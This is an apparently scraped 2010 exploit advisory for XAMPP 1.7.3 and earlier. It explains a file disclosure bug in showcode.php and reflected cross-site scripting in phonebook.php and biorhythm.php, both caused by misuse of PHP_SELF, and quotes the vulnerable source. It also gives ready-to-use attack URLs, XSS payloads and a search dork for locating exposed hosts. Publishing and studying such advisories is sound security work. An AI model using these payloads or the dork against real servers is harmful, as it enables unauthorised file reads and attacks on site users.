扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 |
# _ ___________ #(_)____ _ __/ __ \/ /_________/ /_/_/ | # / // __ \ | / / / / / //_/ _ \/ __// / / / #/ // / / / |/ / /_/ / ,< /__/ /_/ // / / / # /_//_/ /_/|___/\____/_/|_|\___/\__,_// /_/_/ # Live by the byte |_/_/ # # Members: # # Pr0T3cT10n # -=M.o.B.=- # TheLeader # Sro # Debug # # Contact: inv0ked.israel@gmail.com # # ----------------------------------- # # Exploit Title: XAMPP <= 1.7.3 multiple vulnerabilites # Date: 31/10/2010 # Author: TheLeader # Software Link: http://www.apachefriends.org/en/xampp-windows.html # Affected Version: 1.7.3 and prior # Tested on Windows XP Hebrew, Service Pack 3 # ISRAEL, NULLBYTE.ORG.IL # # ----------------------------------- I. File disclosure XAMPP is vulnerable to a remote file disclosure attack. The vulnerability exists within the web application supplied with XAMPP. http://[host]/xampp/showcode.php/c:boot.ini?showcode=1 showcode.php: <?php echo '<br><br>'; if ($_REQUEST['showcode'] != 1) { echo '<a href="https://www.exploit-db.com/exploits/15370/'.$_SERVER['PHP_SELF'].'?showcode=1">'.$TEXT['global-showcode'].'</a>'; } else { $file = file_get_contents(basename($_SERVER['PHP_SELF'])); echo "<h2>".$TEXT['global-sourcecode']."</h2>"; echo "<textarea cols='100' rows='10'>"; echo htmlspecialchars($file); echo "</textarea>"; } ?> showcode.php relies on basename($_SERVER['PHP_SELF']) to retrieve the path. What $_SERVER['PHP_SELF'] actually does is retrieve is the path of the requested file. basename() parses the last element of that path using "/" as a delimiter. Traveling through the directory tree, though, requires the "/" character that is used by basename() as a delimiter. Therefor directory traveling it is not achieved but it is possible to view file contents from any drive, and the XAMPP htdocs directory. II. Cross Site Scripting http://[host]/xampp/phonebook.php/"><script>alert("XSS")</script> http://[host]/xampp/biorhythm.php/"><script>alert("XSS")</script> It is interesting to see the same programming error lead to another security vulnerability. Some PHP scripts in the XAMPP dir rely on $_SERVER['PHP_SELF'] for retrieving the "action" tag for HTML forms. This can be exploited to perform Cross Site Scripting attacks. biorhythm.php (line 75): <form method="post" action="<?php echo basename($_SERVER['PHP_SELF']); ?>"> dork: "inurl:xampp/biorhythm.php" |
体验盒子
